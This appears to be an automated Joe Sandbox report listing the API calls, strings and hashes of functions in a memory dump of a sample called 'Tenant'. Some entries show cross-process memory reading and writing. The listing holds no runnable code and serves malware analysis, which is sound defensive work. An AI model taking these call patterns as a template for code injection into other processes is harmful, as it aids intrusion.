                                                                                        • Instruction ID: e8ff19ff52cbde479a5e9b693ebd87794f3b426ae0f82378bb6b1e93ac7c57f8
                                                                                        • Opcode Fuzzy Hash: ee935568bb4a4c52d5a473f1f6b85901433485b807c79c35529a2d51d9f93a8e
                                                                                        • Instruction Fuzzy Hash: 99013535C11A1D9BCF20AFA4E8989EEBBBCFF08711F108196E902B2580DF309550CBA1
                                                                                        APIs
                                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7C62,80070057,?,?,?,00AF8073), ref: 00AF7D45
                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7C62,80070057,?,?), ref: 00AF7D60
                                                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7C62,80070057,?,?), ref: 00AF7D6E
                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7C62,80070057,?), ref: 00AF7D7E
                                                                                        • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7C62,80070057,?,?), ref: 00AF7D8A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 3897988419-0
                                                                                        • Opcode ID: 1ebfafab7f3ad90102c46bb6c6beb3db674025cbc9a3086831bebad6e0aa0043
                                                                                        • Instruction ID: be0d8ad42b4c117da50721ae404cfc9fb226adb16894c4a435d27e8945da94d1
                                                                                        • Opcode Fuzzy Hash: 1ebfafab7f3ad90102c46bb6c6beb3db674025cbc9a3086831bebad6e0aa0043
                                                                                        • Instruction Fuzzy Hash: 28017C76615219ABDB115F98DC44BBE7BBDEF44792F644068FA08D7210EB71ED00CBA0
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AF8CDE
                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AF8CE8
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AF8CF7
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AF8CFE
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AF8D14
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        • Opcode ID: 528a126aba9e6ad2688ac1e69d27c763a0f1315b257df418368a79c34ee7c5e5
                                                                                        • Instruction ID: 36b8f636642f27e574a44b0ef8b88899821bec6073dea9fa433fc84f0383bd12
                                                                                        • Opcode Fuzzy Hash: 528a126aba9e6ad2688ac1e69d27c763a0f1315b257df418368a79c34ee7c5e5
                                                                                        • Instruction Fuzzy Hash: E0F08734210208BFEB102FE49CC8E7B3BACEF89B54B204029FA44C3190CE60AC00DB60
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AF8D3F
                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8D49
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8D58
                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8D5F
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8D75
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        • Opcode ID: 958a5edb75b064a185f0970f37c82b7422e346e8df39ad3e8b9ddcbc56991775
                                                                                        • Instruction ID: b6534be76bfc1c99352c8d0ab3369d6045b74ac1796a960e65b12cabd1aa47ff
                                                                                        • Opcode Fuzzy Hash: 958a5edb75b064a185f0970f37c82b7422e346e8df39ad3e8b9ddcbc56991775
                                                                                        • Instruction Fuzzy Hash: 7FF08C34210208AFEB111FA4EC98F7B3BACEF49754F240115FA4483190CF609D00DA60
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00AFCD90
                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00AFCDA7
                                                                                        • MessageBeep.USER32(00000000), ref: 00AFCDBF
                                                                                        • KillTimer.USER32(?,0000040A), ref: 00AFCDDB
                                                                                        • EndDialog.USER32(?,00000001), ref: 00AFCDF5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3741023627-0
                                                                                        • Opcode ID: b92d74fb2cf0515cc768e3df28cee2e3b2fca7ec3ae78714b05a8759fc0f943e
                                                                                        • Instruction ID: 965e3369cd1885d5f3ac3e91bbba4a1882afdcc875c1b00149f2ea667c841aeb
                                                                                        • Opcode Fuzzy Hash: b92d74fb2cf0515cc768e3df28cee2e3b2fca7ec3ae78714b05a8759fc0f943e
                                                                                        • Instruction Fuzzy Hash: 79018B3051070CABEB256B51DD5EBAA7B78FF00715F100669F682610D1DFF4A954CB80
                                                                                        APIs
                                                                                        • EndPath.GDI32(?), ref: 00AA179B
                                                                                        • StrokeAndFillPath.GDI32(?,?,00ADBBC9,00000000,?), ref: 00AA17B7
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00AA17CA
                                                                                        • DeleteObject.GDI32 ref: 00AA17DD
                                                                                        • StrokePath.GDI32(?), ref: 00AA17F8
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                        • String ID:
                                                                                        • API String ID: 2625713937-0
                                                                                        • Opcode ID: 52027df402bc8738899f27ddc3b6bdc48159a85175a9a94086bcfc1f7d9f3863
                                                                                        • Instruction ID: 28e7c4a250f7c6d648dcf12f5d29439e541d405e65645b76281beb3fe09fda3b
                                                                                        • Opcode Fuzzy Hash: 52027df402bc8738899f27ddc3b6bdc48159a85175a9a94086bcfc1f7d9f3863
                                                                                        • Instruction Fuzzy Hash: 72F0EC30058708FBDB15AF26ED5C7593FA4AB0232AF148224F42A5B1F0CF794995DF50
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 00B0CA75
                                                                                        • CoCreateInstance.OLE32(00B33D3C,00000000,00000001,00B33BAC,?), ref: 00B0CA8D
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                        • CoUninitialize.OLE32 ref: 00B0CCFA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                        • String ID: .lnk
                                                                                        • API String ID: 2683427295-24824748
                                                                                        • Opcode ID: 8b5b52d584a31136396520fba032127acf7ba9f7cd10cda93a7581edf641d80b
                                                                                        • Instruction ID: 5a27a8f02163fa2373a70cf8c04d067338b8d261d376d22f933f1707d8b206b5
                                                                                        • Opcode Fuzzy Hash: 8b5b52d584a31136396520fba032127acf7ba9f7cd10cda93a7581edf641d80b
                                                                                        • Instruction Fuzzy Hash: D3A14D71104205AFD300EF64C991EAFB7ECEF99714F40495DF155971A2EBB0EA09CBA2
                                                                                        APIs
                                                                                          • Part of subcall function 00AC0FE6: std::exception::exception.LIBCMT ref: 00AC101C
                                                                                          • Part of subcall function 00AC0FE6: __CxxThrowException@8.LIBCMT ref: 00AC1031
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                          • Part of subcall function 00AB1680: _memmove.LIBCMT ref: 00AB16DB
                                                                                        • __swprintf.LIBCMT ref: 00AAE598
                                                                                        Strings
                                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00AAE431
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                        • API String ID: 1943609520-557222456
                                                                                        • Opcode ID: df82f3e83ae753078568aca5678108e9623926affdc897c694c9992c87c18a2d
                                                                                        • Instruction ID: 7f94291b05def2df252eaa25ef610232d8e031420c4a35a7f61fd6afbaccdadb
                                                                                        • Opcode Fuzzy Hash: df82f3e83ae753078568aca5678108e9623926affdc897c694c9992c87c18a2d
                                                                                        • Instruction Fuzzy Hash: 44919E719082419FC714EF24D9A5CAFB7F8EF96304F44491DF496972A2EB20EE44CB92
                                                                                        APIs
                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00AC52CD
                                                                                          • Part of subcall function 00AD0320: __87except.LIBCMT ref: 00AD035B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorHandling__87except__start
                                                                                        • String ID: pow
                                                                                        • API String ID: 2905807303-2276729525
                                                                                        • Opcode ID: 86b37678a6bd8157610ae108cab12f9580f2711b0ec7e6f74e4829c687b84340
                                                                                        • Instruction ID: a73762f29230f3c1a9a020d4948c40dbc512298199f69003400008bd0a8ae91a
                                                                                        • Opcode Fuzzy Hash: 86b37678a6bd8157610ae108cab12f9580f2711b0ec7e6f74e4829c687b84340
                                                                                        • Instruction Fuzzy Hash: E45157B1E09A0186CB11A734CA11FAE3BE4DB40750F31496EF4D38A3E5EE789CC49A46
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID:
• String ID: #$+
• API String ID: 0-2552117581
• Opcode ID: 825fca8804ce94d9fb2edb75726d1dac124c8b230816d627917f851913dfc074
• Instruction ID: 233f5e3167ce48663061c85e72705867bea75f599bf5cea9aaf7d132d6dea2b1
• Opcode Fuzzy Hash: 825fca8804ce94d9fb2edb75726d1dac124c8b230816d627917f851913dfc074
• Instruction Fuzzy Hash: 50512375404249DFDF25EFA8C490EFA7BB4EF56310F144059F9919B291C734AD42CBA0
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: _memset$_memmove
• String ID: ERCP
• API String ID: 2532777613-1384759551
• Opcode ID: cbcc59c154720ff362f508ecbc31c89c40586828f08b11aaaad18a838fca7e31
• Instruction ID: 8d7a9833b8f1d5a139753f29b56b2ba0d0afa9ab697d2ebc286c655866b50d93
• Opcode Fuzzy Hash: cbcc59c154720ff362f508ecbc31c89c40586828f08b11aaaad18a838fca7e31
• Instruction Fuzzy Hash: 7151B3B1900309DFDB24DF65C881BEABBF9EF04311F2485AEE94ADB242E7309585CB40
APIs
  • Part of subcall function 00B01CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AF9E4E,?,?,00000034,00000800,?,00000034), ref: 00B01CE5
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00AFA3F7
  • Part of subcall function 00B01C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AF9E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00B01CB0
  • Part of subcall function 00B01BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00B01C08
  • Part of subcall function 00B01BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00AF9E12,00000034,?,?,00001004,00000000,00000000), ref: 00B01C18
  • Part of subcall function 00B01BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00AF9E12,00000034,?,?,00001004,00000000,00000000), ref: 00B01C2E
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00AFA464
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00AFA4B1
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• String ID: @
• API String ID: 4150878124-2766056989
• Opcode ID: 7e398cf1f357cb5fbfde693e2ed3b2309ddfa462469dc797de87d481bda383c4
• Instruction ID: a1bca3cf06398a824a7a1a16efee961de9e4153be8e0d9637af4d842b70a2bea
• Opcode Fuzzy Hash: 7e398cf1f357cb5fbfde693e2ed3b2309ddfa462469dc797de87d481bda383c4
• Instruction Fuzzy Hash: 6A41617290021CBFDB24DFA4CD85AEEBBB8EF45300F104495FA55B7181DA706E85CB61
APIs
• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B27A86
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B27A9A
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00B27ABE
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: SysMonthCal32
• API String ID: 2326795674-1439706946
• Opcode ID: cdee5810b1b8f4621efbaf399ce05d40812eafa55832e4800eb0b7a090a99c3b
• Instruction ID: 772ba9fb8085bef6916e9da05dae14586f8102513834c9691b20694907cba2bb
• Opcode Fuzzy Hash: cdee5810b1b8f4621efbaf399ce05d40812eafa55832e4800eb0b7a090a99c3b
• Instruction Fuzzy Hash: 4221B132650229AFDF118F54DC42FEE3BA9EF49724F110254FE196B1D0DAB1AC548B90
APIs
• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00B2826F
• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00B2827D
• DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B28284
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: MessageSend$DestroyWindow
• String ID: msctls_updown32
• API String ID: 4014797782-2298589950
• Opcode ID: e17eff0aae09f0b9ee98f8f188cdba21d26c2d61ab41049c5a1eb20358f41a5d
• Instruction ID: bd58e9e1e856fc6a2fd4d472f1582a6a587f423f09e402e595e43a8c6dd2dbe8
• Opcode Fuzzy Hash: e17eff0aae09f0b9ee98f8f188cdba21d26c2d61ab41049c5a1eb20358f41a5d
• Instruction Fuzzy Hash: EC217CB5604219AFDB00DF58EC85D6737EDEB4A354B080599FA059B2A1CF70EC11CBB0
APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B27360
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B27370
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B27395
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
• Opcode ID: bfe0e8ccb13a69fecb914a1a64d4918e117403f100e4c114afb159ab1584984d
• Instruction ID: 31de0ecead59de5b0abf02797635ed1c5aaeab729ba361f921b1b308e5944a5a
• Opcode Fuzzy Hash: bfe0e8ccb13a69fecb914a1a64d4918e117403f100e4c114afb159ab1584984d
• Instruction Fuzzy Hash: EE21D032254128BFDF118F54DC81FBF3BAAEF89750F108164F9089B190CA71AC129BA8
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B27D97
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B27DAC
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B27DB9
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: 6dfebb64c4550c8c5e437d13767098bbf90e7f8de3b6b7bb25bb4100451a2bcc
• Instruction ID: d017221e350e5fdc156f1588e73778e9290597bdc21a21e03b04af0742656e83
• Opcode Fuzzy Hash: 6dfebb64c4550c8c5e437d13767098bbf90e7f8de3b6b7bb25bb4100451a2bcc
• Instruction Fuzzy Hash: FC11E772244208BFDF105F64DC45FEB3BE9EF89B54F11462CFA45A60D0DA719811CB24
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00AE027A,?), ref: 00B1C6E7
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00B1C6F9
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetSystemWow64DirectoryW$kernel32.dll
• API String ID: 2574300362-1816364905
• Opcode ID: f9fac1f3a90ada8039bf1854414998890233e9cf2e2f1671f243fa0dfa791da4
• Instruction ID: c53f097c7799bf6282313738d55033480ebe95c36f2ccd1be528aa21257267fc
• Opcode Fuzzy Hash: f9fac1f3a90ada8039bf1854414998890233e9cf2e2f1671f243fa0dfa791da4
• Instruction Fuzzy Hash: D0E01279560712CFD7606B29CC59F9A7BD4FF06755BA084AAF885D32A0DBB0DC808F50
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00AB4AF7,?), ref: 00AB4BB8
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AB4BCA
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
